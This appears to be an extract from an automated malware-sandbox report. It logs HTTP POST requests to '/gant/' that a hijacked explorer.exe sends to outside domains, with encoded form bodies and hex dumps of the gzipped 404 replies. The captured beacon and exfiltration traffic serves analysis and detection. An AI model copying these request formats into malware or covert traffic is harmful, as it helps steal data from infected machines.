                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 5a 50 6c 34 65 72 71 5a 4f 74 47 37 4c 57 61 50 59 78 28 73 43 63 55 6c 68 65 47 34 6a 37 51 36 4d 30 6b 67 6d 72 5a 61 59 57 35 4d 6c 75 74 67 35 47 64 7a 44 37 73 5f 4a 46 47 6a 70 45 68 53 55 51 28 42 5a 5f 6f 74 58 64 74 71 45 35 51 37 37 69 4e 64 76 72 36 66 78 71 68 35 42 74 6b 71 77 53 76 44 68 32 56 51 62 61 68 72 7a 70 72 4b 36 64 45 64 6a 55 46 73 5a 2d 64 41 37 65 53 33 38 48 63 58 39 61 43 50 54 39 62 59 7a 43 42 56 57 79 79 35 4e 6d 76 68 48 73 5a 55 31 59 50 42 43 45 6b 6d 39 41 6b 65 6d 79 4b 4f 62 51 36 52 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ZPl4erqZOtG7LWaPYx(sCcUlheG4j7Q6M0kgmrZaYW5Mlutg5GdzD7s_JFGjpEhSUQ(BZ_otXdtqE5Q77iNdvr6fxqh5BtkqwSvDh2VQbahrzprK6dEdjUFsZ-dA7eS38HcX9aCPT9bYzCBVWyy5NmvhHsZU1YPBCEkm9AkemyKObQ6RXQ).
                                                                                                                  Feb 13, 2023 19:06:12.920516014 CET1653INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:06:12 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  73192.168.11.2049932217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:06:24.314667940 CET1661OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.performingartshub.co.uk
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.performingartshub.co.uk/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 5a 50 6c 34 65 72 71 5a 4f 74 47 37 49 32 4b 50 5a 54 58 73 4b 63 55 6d 6b 65 47 34 6f 62 51 32 4d 7a 73 67 6d 75 6f 64 59 45 74 4d 6c 4c 4a 67 34 48 64 7a 45 37 73 5f 52 56 47 6d 6e 6b 68 5a 55 51 6a 5f 5a 37 6f 74 58 64 4a 71 4b 72 59 37 77 79 4e 43 6e 4c 36 65 6d 61 68 38 46 74 6b 67 77 53 69 67 68 33 42 51 62 70 31 72 79 72 44 4b 72 59 34 65 70 6b 46 75 64 4f 64 44 31 2d 53 44 38 41 55 6c 39 65 44 34 54 4d 66 59 77 69 68 56 58 79 79 2d 48 57 75 49 4b 4d 59 48 77 70 71 58 4a 30 41 39 72 53 63 63 68 41 48 48 66 6a 54 5f 41 2d 58 30 37 78 4a 74 50 47 36 73 54 7a 4c 31 77 71 5a 41 67 73 4f 5f 4f 53 41 34 32 49 63 52 78 30 63 45 4b 79 55 44 5a 63 6e 75 47 53 31 43 72 66 31 79 4b 42 47 34 63 55 77 77 76 47 52 70 7a 4f 52 35 52 43 5a 66 4f 58 57 77 62 31 6b 46 56 65 36 4b 56 51 55 63 47 7a 76 55 71 4e 4b 75 70 64 73 6f 63 6e 51 70 42 68 6f 31 71 58 5a 4c 78 5f 34 57 6f 73 39 2d 37 31 5a 34 54 74 4d 47 4f 6c 66 69 4c 38 75 77 51 6b 63 42 5a 6a 43 53 64 51 73 63 71 4c 54 7a 67 53 77 34 53 68 4a 33 46 6a 44 4a 6a 7a 70 76 69 48 66 39 46 6e 6d 4e 63 65 48 6d 78 6a 7a 46 6c 57 4d 6e 31 41 45 62 6d 47 64 32 4e 6a 4d 6c 73 49 33 4b 58 54 6b 58 4c 54 71 59 79 4d 68 35 32 4b 7e 44 6d 61 45 74 63 52 7e 57 31 41 76 52 58 72 62 37 4a 69 65 5f 6e 63 54 4c 66 58 64 65 6a 68 42 57 42 65 53 5a 6e 35 69 2d 6d 52 72 53 73 76 75 59 32 32 77 47 50 65 61 63 52 75 66 7a 71 64 28 55 74 71 58 5a 37 55 59 43 73 41 31 61 63 73 35 51 38 49 35 38 35 66 28 45 31 62 5a 2d 31 45 7a 6b 48 37 33 31 59 74 35 63 38 4d 34 43 66 4e 31 79 74 68 28 55 43 76 36 46 59 35 45 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ZPl4erqZOtG7I2KPZTXsKcUmkeG4obQ2MzsgmuodYEtMlLJg4HdzE7s_RVGmnkhZUQj_Z7otXdJqKrY7wyNCnL6emah8FtkgwSigh3BQbp1ryrDKrY4epkFudOdD1-SD8AUl9eD4TMfYwihVXyy-HWuIKMYHwpqXJ0A9rScchAHHfjT_A-X07xJtPG6sTzL1wqZAgsO_OSA42IcRx0cEKyUDZcnuGS1Crf1yKBG4cUwwvGRpzOR5RCZfOXWwb1kFVe6KVQUcGzvUqNKupdsocnQpBho1qXZLx_4Wos9-71Z4TtMGOlfiL8uwQkcBZjCSdQscqLTzgSw4ShJ3FjDJjzpviHf9FnmNceHmxjzFlWMn1AEbmGd2NjMlsI3KXTkXLTqYyMh52K~DmaEtcR~W1AvRXrb7Jie_ncTLfXdejhBWBeSZn5i-mRrSsvuY22wGPeacRufzqd(UtqXZ7UYCsA1acs5Q8I585f(E1bZ-1EzkH731Yt5c8M4CfN1yth(UCv6FY5E.
                                                                                                                  Feb 13, 2023 19:06:24.341049910 CET1662INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:06:24 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  8192.168.11.2049849103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:29.382496119 CET537OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 55 49 45 6e 30 6e 68 7a 38 37 30 39 62 62 4a 6d 6d 4f 62 54 75 35 6b 55 4c 61 70 41 4d 47 73 4f 59 74 55 55 74 30 51 46 53 38 38 67 68 46 72 51 6a 4a 64 61 71 4b 6c 43 61 4b 66 77 6e 30 68 5f 72 30 49 44 48 63 75 57 4a 6e 48 53 7a 44 52 6d 46 68 49 58 70 56 36 73 39 4f 6b 44 42 4d 34 77 68 63 7a 6d 77 77 74 57 62 49 69 4a 4a 52 35 52 37 70 6c 68 37 7a 71 49 36 7a 49 41 39 36 61 70 35 55 53 65 57 34 73 74 7e 4f 67 46 6c 33 4a 57 7a 61 59 36 74 48 66 4c 42 57 65 4f 76 33 57 68 6a 2d 42 79 30 46 38 33 55 66 53 70 42 34 6f 62 7e 73 37 79 75 4c 48 35 56 4c 6a 61 39 32 39 4d 61 6c 54 69 4a 53 78 55 54 72 72 32 64 44 68 73 42 44 6f 37 6d 69 4a 54 64 6d 49 41 30 37 67 43 52 74 6d 43 77 75 65 41 58 66 36 33 32 57 48 65 30 41 69 58 6f 6d 32 70 4b 73 58 65 46 78 7e 34 28 32 7a 4e 57 47 43 39 62 4f 63 31 7a 74 4b 71 64 47 41 69 33 33 74 52 77 4e 32 32 47 4b 34 72 52 32 6b 55 61 38 48 37 38 54 5a 73 77 37 33 74 79 66 75 68 66 78 50 44 4c 44 57 75 42 43 30 39 46 6c 28 6a 31 38 48 4e 4e 65 6e 33 77 59 4f 66 48 35 4e 52 51 42 61 36 49 77 34 61 61 4c 67 41 6d 67 50 4a 72 43 62 51 49 77 6e 49 62 31 62 71 55 34 30 6f 42 68 57 50 7a 52 73 6e 36 47 49 67 50 34 5a 77 35 36 32 76 49 4b 77 38 75 55 69 57 57 4d 37 38 6b 63 52 62 50 37 66 78 6e 6d 33 51 6b 41 51 2d 7e 76 71 67 77 76 68 48 4c 71 49 48 57 55 71 33 64 2d 66 5f 58 78 50 77 39 32 49 61 74 7a 44 32 58 71 34 61 65 49 53 62 72 32 56 45 63 36 42 4b 37 5f 35 6f 4c 7a 48 46 72 6e 73 63 41 39 55 39 72 38 57 72 36 50 65 6c 55 39 41 50 4c 64 31 6a 6f 55 71 47 62 36 4d 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ewKm7lkt8wgBUIEn0nhz8709bbJmmObTu5kULapAMGsOYtUUt0QFS88ghFrQjJdaqKlCaKfwn0h_r0IDHcuWJnHSzDRmFhIXpV6s9OkDBM4whczmwwtWbIiJJR5R7plh7zqI6zIA96ap5USeW4st~OgFl3JWzaY6tHfLBWeOv3Whj-By0F83UfSpB4ob~s7yuLH5VLja929MalTiJSxUTrr2dDhsBDo7miJTdmIA07gCRtmCwueAXf632WHe0AiXom2pKsXeFx~4(2zNWGC9bOc1ztKqdGAi33tRwN22GK4rR2kUa8H78TZsw73tyfuhfxPDLDWuBC09Fl(j18HNNen3wYOfH5NRQBa6Iw4aaLgAmgPJrCbQIwnIb1bqU40oBhWPzRsn6GIgP4Zw562vIKw8uUiWWM78kcRbP7fxnm3QkAQ-~vqgwvhHLqIHWUq3d-f_XxPw92IatzD2Xq4aeISbr2VEc6BK7_5oLzHFrnscA9U9r8Wr6PelU9APLd1joUqGb6M.
                                                                                                                  Feb 13, 2023 19:00:30.248259068 CET539INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  x-litespeed-tag: 90d_HTTP.404
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                                                                  x-litespeed-cache-control: no-cache
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  Data Raw: 31 61 36 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf
                                                                                                                  Data Ascii: 1a60}k[%$E%JI$u|V5]dHj49Su{HWcR$h4Fq|7dQ-$,_j<5AwEW'o.b$\o6_RMyVTiuZ\F&?tq(CKpsQVw::FfU Oy^~{[`+)/=}c\e#O[yE6aX;IX1*~'6$*2ViDlJSV|b'I~&O.Ox3^S(t8d@XR"eHuKytXonFV'UvN~y\rq5E>qQ*ZIliU>PSi*"uF^|}?yI.6e%Kh\Y18N-?XeZ#vdjo+my:t?^y3GhA6,YdHz'@H|s#NdS/Q85?_7I ?.$lUe`'_VituWVT/L/UCi!KoX26zzNu689++gYngyXYX)@Y$?0E\|[5cf
                                                                                                                  Feb 13, 2023 19:00:30.248373985 CET540INData Raw: 3f 1b 0c ce 0b 5e ad 8a 94 3c 1d 6e 25 e1 f2 cb cb cb 0e ec 87 a6 61 e1 19 17 fc aa b6 39 25 44 55 1b 9c 57 66 59 84 97 5c af cc 88 cf 78 71 59 99 62 18 03 df 86 9f d8 0d 93 25 75 06 0c 95 9c 2e 7f 77 f7 23 9b ff 81 2d f9 99 06 f3 80 36 f8 ab f5
                                                                                                                  Data Ascii: ?^<n%a9%DUWfY\xqYb%u.w#-63EDgagoilYYr{~j6yLx:o~3h5ku,Apq'q/*5&%cEM\?Vq0
                                                                                                                  Feb 13, 2023 19:00:30.248431921 CET541INData Raw: dc b7 2c a9 09 6b 11 a4 59 17 c5 83 22 f0 b2 b4 c9 0a 6e d4 f3 53 72 27 66 28 1e 19 55 96 df ab 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f 3a 60 c4 ab e3 41 08 86 76 40 20 25 3c 8d 5a 96 b0 5b e9 0b 1b 05 b4 97 25 42 32 e2 d2 48 b3 ca 28 2b 16 7e e6
                                                                                                                  Data Ascii: ,kY"nSr'f(U!bEu</:`Av@ %<Z[%B2H(+~2\mqLYjY_*bm<p:9X-!&"[O68}gFD`.nzHk^h@5[*m`YQ)=oGuLIs~$F)x-y2;t(1>wA?
                                                                                                                  Feb 13, 2023 19:00:30.248486042 CET543INData Raw: ba 1e f0 cd 8e 06 86 b7 9d 51 93 0e fa 2b 08 a5 21 37 5c 5a f1 55 e7 94 f6 ad c1 d2 70 91 15 3b 44 bb bf 4e ff 5b 09 69 c2 c2 2a be e1 2f 08 10 15 de 0b c2 bb 89 61 06 8a 5e 0e 22 2e 53 c4 7a ac b3 0c d9 5a 98 ec e8 af c6 d3 88 fe 0a 23 c9 e6 59
                                                                                                                  Data Ascii: Q+!7\ZUp;DN[i*/a^".SzZ#Y6`S'YsFb%%KpD,B{PQ2!Af(0xH9"0XA_l/iJ>v`|4k6{Qd*z0\/^Vg,,F~v
                                                                                                                  Feb 13, 2023 19:00:30.248538017 CET544INData Raw: 87 59 74 55 70 0f a6 16 5a c1 13 06 21 30 af 42 f7 1c 02 a5 78 da e3 83 c6 60 a6 9c 41 14 fc ab 60 8e e2 a5 61 dd 67 39 0b e3 ea 6e a2 4e c0 3d dc 78 7a af 18 b4 45 62 aa c7 f2 5e 16 8b ad 60 b1 5f 8d 5f 8e 82 c5 79 35 2c ae 82 45 0d ff 79 59 8e
                                                                                                                  Data Ascii: YtUpZ!0Bx`A`ag9nN=xzEb^`__y5,EyYy+XTe`Z[KjXaV3!%L3xP&A9b`kC!9_dt5WjyjM(_MTA4=qf<K8w1I6ELI
                                                                                                                  Feb 13, 2023 19:00:30.248590946 CET545INData Raw: fe 61 16 cf 57 05 6f 16 ba c4 02 ff 42 ff 12 64 9e 64 53 b8 f2 00 16 fe 1b 47 de a7 59 74 27 96 1f 8d b1 8a 52 6b 18 d3 84 85 9f 27 04 62 93 21 ea b5 37 ff 66 6d bd c5 c2 c0 ba 9b 90 b7 6c 3a 0d 42 a7 bf f8 7a 11 57 7c 42 de ce f0 4f 7f 99 9c 25
                                                                                                                  Data Ascii: aWoBddSGYt'Rk'b!7fml:BzW|BO%PFAb<a><6qJiofE|H:l9ogtwitMp*W91~)5Gt04JSyB;:Zg$SN[yY]!86!o#Q
                                                                                                                  Feb 13, 2023 19:00:30.249964952 CET546INData Raw: 31 63 34 38 0d 0a e2 ef 83 b4 8c 23 cc 2b 34 21 d4 84 6c f5 3b c1 2d b3 08 ef 28 9a 10 7b 7f c1 69 3c 9f 10 67 1f a8 69 3c 9f 83 05 eb ee 2b c4 61 4d 9d ad ca 09 a1 56 7f b9 19 5b c6 c9 9d 61 f0 14 0e 46 18 25 4b cb 09 d1 be c1 5f e4 03 4b 4b 4d
                                                                                                                  Data Ascii: 1c48#+4!l;-({i<gi<+aMV[aF%K_KKM'(y6ZHoX|E"5!twF.$a/wW5!{xE6IXG@mD(_TeEq:!^P/nbG#PZgjIb_} {a:HC)4
                                                                                                                  Feb 13, 2023 19:00:30.250037909 CET548INData Raw: 1a 83 ae c2 a8 af 71 ad 3d e2 3b 54 5d dd b5 cd 42 bd 2e 0f 33 f1 a0 99 96 a5 b5 bd 9b a8 ed fa c2 2e 6c 20 ec d6 f4 bb 49 10 75 5a 2a 84 65 f8 18 22 d0 58 dd 0a 39 c5 9b ce b7 ae c8 d9 0d 57 e5 78 a3 70 06 e7 b8 ec ee 0e 4d 71 d5 c3 ae 01 2a 2f
                                                                                                                  Data Ascii: q=;T]B.3.l IuZ*e"X9WxpMq*/3pNI0Y6<-`'tSnrY2h.)\dp`O=C=V;y$c6Cz wGBy$nq-8PQ"
                                                                                                                  Feb 13, 2023 19:00:30.250097036 CET549INData Raw: 6c ca 2e 4f 59 92 9c 92 e1 d5 c9 c5 71 b4 a2 31 20 d3 87 bd 1a c1 0a 92 1d 54 67 69 72 47 04 19 84 a5 11 81 5c ce 22 b7 d4 84 8c fc 20 bf 1d 3c a6 51 73 9e f2 82 25 c6 6b 35 68 47 23 1e c9 7a 54 b4 32 8b ec 6b 89 4a 8b e3 10 cd ed 3c a6 48 60 ad
                                                                                                                  Data Ascii: l.OYq1 TgirG\" <Qs%k5hG#zT2kJ<H`+bq^yub*"&*51U\qFo+.a=PP~1ql]B:l7!70!{I-Ky8'DkKUp%<awRY. E(8qM(tH
                                                                                                                  Feb 13, 2023 19:00:30.250150919 CET550INData Raw: d8 90 89 0d 88 44 17 ea 9b ba 09 48 eb c5 70 c1 59 74 75 72 72 81 79 b1 a4 a1 c2 8b 22 2b 5c cb 25 70 10 7c 39 e5 78 77 4f 9e a5 65 7c c3 89 d8 4b 90 2b 24 a2 da 34 69 66 7c 2a 35 98 31 6f e6 e4 76 99 a4 e5 65 2d 1a eb f5 da 5c 3b 38 22 6c cb b2
                                                                                                                  Data Ascii: DHpYturry"+\%p|9xwOe|K+$4if|*51ove-\;8"l\#^ju<w}Y7]#]j3\#E? MFmEE<='=7M19i.!F.">+.fqR"%b39K?Qa1^0"&
                                                                                                                  Feb 13, 2023 19:00:30.376979113 CET552INData Raw: cf 31 7c d3 23 be 39 22 e2 9d 67 f8 a6 4f c4 3b 9f 50 83 fe a2 5d 5d 0c 01 38 04 7d c1 06 a2 2a 5a 4f 95 ae 5a cd 75 44 ab 79 d9 76 dd 2a d9 db 11 a8 7b e3 94 17 1a 04 a1 d4 45 61 f2 7b bc 22 ec 91 62 03 d4 61 9f f6 33 20 8a 06 a7 d3 4d 63 a6 15
                                                                                                                  Data Ascii: 1|#9"gO;P]]8}*ZOZuDyv*{Ea{"ba3 Mc|}-F6\d$)gi]]_DkWY~1*WbN&4b-/YQdyg0V9U3\%n1J76lBD?GW:],Yv1k^bs_DFS


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  9192.168.11.2049850103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:32.040086985 CET565OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 55 49 45 6e 30 6e 68 7a 38 37 30 39 62 62 4a 6d 6d 4f 62 54 75 35 6b 55 4c 61 70 41 4d 47 6b 4f 5a 63 30 55 73 56 51 46 41 73 38 67 76 6c 72 72 6a 4a 64 4c 71 4b 39 47 61 4b 54 4f 6e 32 5a 5f 71 6e 77 44 41 75 57 57 4d 6e 48 52 76 54 52 6b 58 52 49 44 70 56 32 34 39 4b 45 31 41 38 6b 77 67 66 72 6d 30 44 30 41 52 34 69 4c 4a 52 35 56 73 35 6c 70 37 7a 75 59 36 7a 4d 41 39 35 7e 70 34 6d 71 65 58 70 73 74 7a 2d 67 45 77 48 49 57 71 4b 59 66 74 48 69 76 42 57 66 31 76 32 69 68 6a 39 35 79 31 47 55 30 55 5f 53 70 66 49 6f 61 30 4d 33 32 75 4c 4c 78 56 4c 6e 61 39 77 35 4d 63 31 54 69 4d 7a 78 54 61 72 72 34 5a 44 68 37 46 44 55 4e 6d 6d 67 71 64 6e 63 41 31 4c 30 43 51 65 7e 43 32 50 65 41 4a 50 36 69 79 57 48 33 37 67 69 31 6f 6d 48 36 4b 6f 6a 52 46 7a 79 34 28 55 37 4e 45 33 43 38 64 75 63 5f 32 74 4b 46 4b 57 63 51 33 32 42 37 77 4e 33 74 47 4c 38 72 52 47 55 55 49 39 48 34 37 44 59 6d 38 62 32 6e 38 5f 69 6e 66 77 6e 4c 4c 44 65 45 42 44 77 39 45 46 28 6a 77 66 76 43 